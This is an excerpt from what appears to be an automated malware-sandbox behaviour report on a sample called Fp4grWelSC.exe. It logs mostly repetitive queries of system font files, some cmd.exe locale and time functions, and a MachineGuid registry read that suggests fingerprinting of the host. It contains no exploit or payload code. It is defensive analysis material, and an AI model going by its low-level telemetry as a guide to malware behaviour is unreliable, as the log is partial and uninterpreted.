          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_011E3F80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_011D96A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,11_2_011D5AEF
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E7513 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_011E7513
